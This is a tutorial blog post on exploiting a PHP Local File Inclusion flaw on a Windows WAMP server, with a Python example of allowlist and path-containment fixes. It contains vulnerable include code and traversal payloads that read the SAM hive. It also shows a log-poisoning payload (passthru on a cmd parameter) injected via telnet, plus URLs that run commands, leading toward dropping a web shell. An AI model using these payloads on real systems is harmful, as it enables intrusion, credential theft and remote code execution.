Local File Inclusion (LFI) on a Windows server
In the previous post I showed Local File Inclusion (LFI) on a Linux server; in this post I will show how LFI works on a Windows server. I will not repeat the introduction here, so for a complete guide please refer to the old post.
What is a Local File Inclusion (LFI) vulnerability?
Local File Inclusion (LFI) is the inclusion of a local file that exists on the web server. The vulnerability occurs when user input controls the path of the file that gets included. When that input is not validated, an attacker can supply the location of known sensitive files and read them, and, as shown later, include any file he can get his own text into.
Here is the vulnerable code.
<?php if (isset($_GET['page'])) include($_GET['page']); // 'page' is used as-is: no allowlist, no path check ?>
The script never checks which file is being included, so we are free to include any file the web server can read simply by changing the value of the 'page' GET parameter.
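As an added example (not code from the original post), here is the same decision written out in Python: the naive behaviour of include($_GET['page']) beside two hardened forms, an allowlist lookup and a web-root containment check that applies Windows path rules (both slash directions, drive letters, UNC paths) on any host. The web root C:\wamp\www is the one disclosed by the error message later in the post; the allowlist entries are assumptions made for the example.

```python
import ntpath

# Web root as disclosed by the WAMP error message in the post; the allowlist
# entries are constructed for this example.
WEBROOT = r"C:\wamp\www"
ALLOWED_PAGES = {"home", "contact", "profile"}


def include_path_naive(page: str) -> str:
    """Mirror of include($_GET['page']): the user's string is the include path."""
    return page


def include_path_allowlist(page: str):
    """Hardened form 1: the parameter is a short name looked up in a fixed set.
    Nothing from the request ever reaches the filesystem as a path."""
    if page not in ALLOWED_PAGES:
        return None
    return ntpath.join(WEBROOT, page + ".php")


def include_path_contained(page: str):
    """Hardened form 2: normalise the path and require it to stay under WEBROOT.
    ntpath applies Windows rules on any host: both '/' and '\\' are separators,
    and a leading drive letter or root makes join() discard the web root."""
    if "\x00" in page:                      # old PHP truncated paths at a NUL byte
        return None
    if page.startswith(("/", "\\")) or ntpath.splitdrive(page)[0]:
        return None                         # rooted, drive-letter or UNC path
    root = ntpath.normpath(WEBROOT)
    candidate = ntpath.normpath(ntpath.join(root, page))
    # normpath has already folded the '..' segments, so a traversal shows up as
    # a result whose common prefix with the web root is shorter than the root
    if candidate == root or ntpath.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    for probe in ("contact.php", "../../windows/repair/sam",
                  r"..\..\windows\repair\sam", "/windows/repair/sam",
                  r"C:\windows\repair\sam", "../logs/access.log"):
        print(f"{probe!r:32} naive={include_path_naive(probe)!r} "
              f"contained={include_path_contained(probe)!r}")
```

The allowlist form is the one to prefer when the set of pages is known; the containment form is for cases where the file name genuinely has to come from the request, and it must reject rooted paths before normalising, because ntpath.join throws the web root away as soon as the second argument is rooted.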
Finding a Local File Inclusion (LFI) vulnerability in a website
Now we are going to look for a local file inclusion in a website. Suppose we have found a page that loads its content through a page parameter (page=contact.php); let's check whether it is vulnerable or not.
Replace contact.php in the page parameter with ../ and request the page again.
After requesting this page we get an error, which is a strong sign of a Local File Inclusion vulnerability. Let's go to the next step.
Warning: include(profile.php) [function.include]: failed to open stream: No such file or directory in C:\wamp\www\test.php on line 2
Warning: include() [function.include]: Failed opening 'profile.php' for inclusion (include_path='.;C:\php5\pear') in C:\wamp\www\test.php on line 3
The warnings are worth reading: they disclose the absolute path of the script (C:\wamp\www\test.php) and the include_path, so we now know the web root and that this is a WAMP install, which puts the Apache logs in C:\wamp\logs, one directory above the web root. A server with display_errors turned off would not give this away and we would have to infer the same from differences in the responses.
On Linux we include /etc/passwd to prove the inclusion; on a Windows server we include /windows/repair/sam instead. The repair/sam file is a backup of the SAM registry hive (the local password database) that older Windows versions (NT, 2000, XP/2003) keep in %SystemRoot%\repair; on newer versions that file does not exist, and other common probe files are C:\boot.ini or C:\windows\win.ini. PHP on Windows accepts forward slashes as well as backslashes, and the hive is binary, so what comes back is the raw bytes of the file rather than readable text.
If the file is not found, move up one directory at a time by prefixing ../ until the path resolves from the web root.
So, as you all know, with Local File Inclusion an attacker can include sensitive files. Now let's go further and get a shell on the web server.
For this we write PHP code into the web server's log files by sending it as part of a request, so that the logged request line becomes the code we include (log poisoning).
<?php passthru($_GET['cmd']); ?>
You can also use system(), exec(), shell_exec(), etc.; these PHP functions all execute operating-system commands.
Here I am going to use telnet to inject the code into the log file as a request line:
telnet localhost 80
GET /<?php passthru($_GET['cmd']); ?> HTTP/1.1
Type the request line exactly as shown and press Enter twice. The server answers with a 404, but Apache still records the request line verbatim in access.log. Telnet is used rather than a browser because a browser would URL-encode the <, ? and space characters, and PHP would then not recognise an open tag when the log is included. (The full <?php tag is used here because the short <? form only works when short_open_tag is enabled.)
The script is now stored on the web server, and we just have to include it.
After including the log file we can execute system-level commands through the cmd parameter, for example:
http://localhost/test.php?page=../logs/access.log&cmd=dir
http://localhost/test.php?page=../logs/access.log&cmd=mkdir%20test
http://localhost/test.php?page=../logs/access.log&cmd=wget
(mkdir needs a directory name, and spaces in the command must be URL-encoded; wget only works if it is installed on the target, since Windows does not ship it.) Note that PHP parses the whole log on every request, so all the earlier request lines are printed before your command output.
With a download tool available on the target you can fetch a web shell and drop it into the web root.
Hope you enjoyed this session and learned something. Thanks for reading, guys. Keep learning 😉